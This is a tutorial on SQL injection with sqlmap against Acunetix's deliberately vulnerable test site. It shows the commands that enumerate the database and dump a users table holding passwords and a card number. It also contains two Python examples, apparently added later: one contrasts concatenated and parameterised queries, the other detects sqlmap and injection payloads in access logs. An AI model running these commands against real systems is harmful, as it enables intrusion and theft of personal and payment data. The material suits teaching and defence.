Basic SQL Injection With Sqlmap - Sang Bui

SQL Injection with sqlmap
Site: http://testphp.acunetix.com/

=======================

1. Check the URL.

Append a single quote (') to the end of the URL to check for an error: http://testphp.acunetix.com/search.php?test=query'

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/search.php on line 61

There is an error: the query failed, so the quote reached the SQL statement unescaped. I will use sqlmap to check it.
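Why the quote test produces an error, and what the fix looks like, as an added example that is not code from the original post. It uses Python's sqlite3 in place of the site's PHP/MySQL, and the table, data and function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the site's search table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products (name) VALUES (?)",
                   [("query tool",), ("o'reilly book",)])
    return db

def search_concat(db, term):
    """Vulnerable pattern: the parameter is pasted into the SQL text."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    try:
        return [row[0] for row in db.execute(sql)], None
    except sqlite3.Error as exc:
        # The PHP page in the post surfaces the same failure as the
        # mysql_fetch_array() warning: the statement no longer parses.
        return [], str(exc)

def search_param(db, term):
    """Hardened pattern: the value is bound and never parsed as SQL."""
    sql = "SELECT name FROM products WHERE name LIKE '%' || ? || '%'"
    return [row[0] for row in db.execute(sql, (term,))]

if __name__ == "__main__":
    db = make_db()
    for term in ("query", "query'", "o'r"):
        print(repr(term), "concat:", search_concat(db, term),
              "param:", search_param(db, term))
```

With the bound parameter, a quote in the search term is just data: it returns matching rows or nothing, and no database error reaches the page.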

root@kali:~# sqlmap -u "http://testphp.acunetix.com/search.php?test=query" --dbs

=> I use this command to find out the names of the databases the site uses (get database name).

[INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

"information_schema" is MySQL's default DB. Ignore it. "acuart" is the name of the site's DB, which is the one we need.

2. With the DB name in hand, get the tables.

root@kali:~# sqlmap -u "http://testphp.acunetix.com/search.php?test=query" --tables -D acuart

Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

sqlmap retrieves the information fairly quickly.

3. Get Columns.

root@kali:~# sqlmap -u "http://testphp.acunetix.com/search.php?test=query" --columns -D acuart

Table: categ
[3 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| cat_id | int(5)      |
| cdesc  | tinytext    |
| cname  | varchar(50) |
+--------+-------------+

Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

Database: acuart
Table: carts
[3 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| cart_id | varchar(100) |
| item    | int(11)      |
| price   | int(11)      |
+---------+--------------+

Database: acuart
Table: pictures
[8 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| a_id   | int(11)      |
| cat_id | int(11)      |
| img    | varchar(50)  |
| pic_id | int(5)       |
| plong  | text         |
| price  | int(11)      |
| pshort | mediumtext   |
| title  | varchar(100) |
+--------+--------------+

Database: acuart
Table: featured
[2 columns]
+--------------+---------+
| Column       | Type    |
+--------------+---------+
| feature_text | text    |
| pic_id       | int(11) |
+--------------+---------+

Database: acuart
Table: products
[5 columns]
+-------------+------------------+
| Column      | Type             |
+-------------+------------------+
| description | text             |
| id          | int(10) unsigned |
| name        | text             |
| price       | int(10) unsigned |
| rewritename | text             |
+-------------+------------------+

Database: acuart
Table: artists
[3 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| adesc     | text        |
| aname     | varchar(50) |
| artist_id | int(5)      |
+-----------+-------------+

Database: acuart
Table: guestbook
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| mesaj    | text         |
| sender   | varchar(150) |
| senttime | int(32)      |
+----------+--------------+

4. Dump Data.

There are quite a few tables; I will pull the data from the table named "users". This table usually holds much of the information needed for an attack.

root@kali:~# sqlmap -u "http://testphp.acunetix.com/search.php?test=query" --dump -D acuart -T users

Database: acuart
Table: users
[1 entry]
+---------------------+------------+----------------------------------+------+-------+---------+-----------------+-----------+
| cc                  | name       | cart                             | pass | uname | phone   | email           | address   |
+---------------------+------------+----------------------------------+------+-------+---------+-----------------+-----------+
| 1234-5678-2300-9000 | John Smith | 2151a037665545e3772e324cce1add90 | test | test  | 2323345 | email@email.com | 21 street |
+---------------------+------------+----------------------------------+------+-------+---------+-----------------+-----------+

[15:32:57] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.acunetix.com/dump/acuart/users.csv'
[15:32:57] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.acunetix.com'

At this point we have the information we need.
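On the defending side, the quote test and the sqlmap runs above leave traces in the web server's access log. The following is an added example, not part of the original post, that flags them. It assumes combined-format log lines; the sample lines, rule names and regular expressions are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Combined log format: ip - - [time] "METHOD target HTTP/x" status size "referer" "agent"
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')
# SQL fragments that have no place in a search term (assumed rule, tune per app).
SQL_WORDS = re.compile(r"\b(?:union\s+(?:all\s+)?select|information_schema|sleep\s*\()", re.I)
STRONG = {"sqlmap_user_agent", "sql_keywords"}

# Constructed sample lines; the addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:15:30:01 +0000] "GET /search.php?test=query HTTP/1.1" 200 4958 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:15:30:09 +0000] "GET /search.php?test=query%27 HTTP/1.1" 200 5012 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:15:31:40 +0000] "GET /search.php?test=query%27%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 200 5101 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '198.51.100.4 - - [01/Jan/2024:15:32:00 +0000] "GET /search.php?test=o%27reilly HTTP/1.1" 200 4958 "-" "Mozilla/5.0"',
]

def scan(lines):
    """Count, per (client, rule), the requests that matched each rule."""
    hits = Counter()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, target, agent = m.groups()
        matched = set()
        # sqlmap's default User-Agent; trivially changed, so never the only rule.
        if agent.lower().startswith("sqlmap/"):
            matched.add("sqlmap_user_agent")
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if value.count("'") % 2 == 1:  # weak signal: also fires on o'reilly
                matched.add("unbalanced_quote")
            if SQL_WORDS.search(value):
                matched.add("sql_keywords")
        hits.update((ip, rule) for rule in matched)
    return hits

def suspects(hits):
    """Clients with at least one strong indicator."""
    return sorted({ip for (ip, rule) in hits if rule in STRONG})

if __name__ == "__main__":
    for (ip, rule), count in sorted(scan(SAMPLE_LOG).items()):
        print(ip, rule, count)
    print("suspects:", suspects(scan(SAMPLE_LOG)))
```

The lone quote is kept as a weak signal only: the fourth sample line shows it firing on an ordinary search, so alerting is driven by the strong rules.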
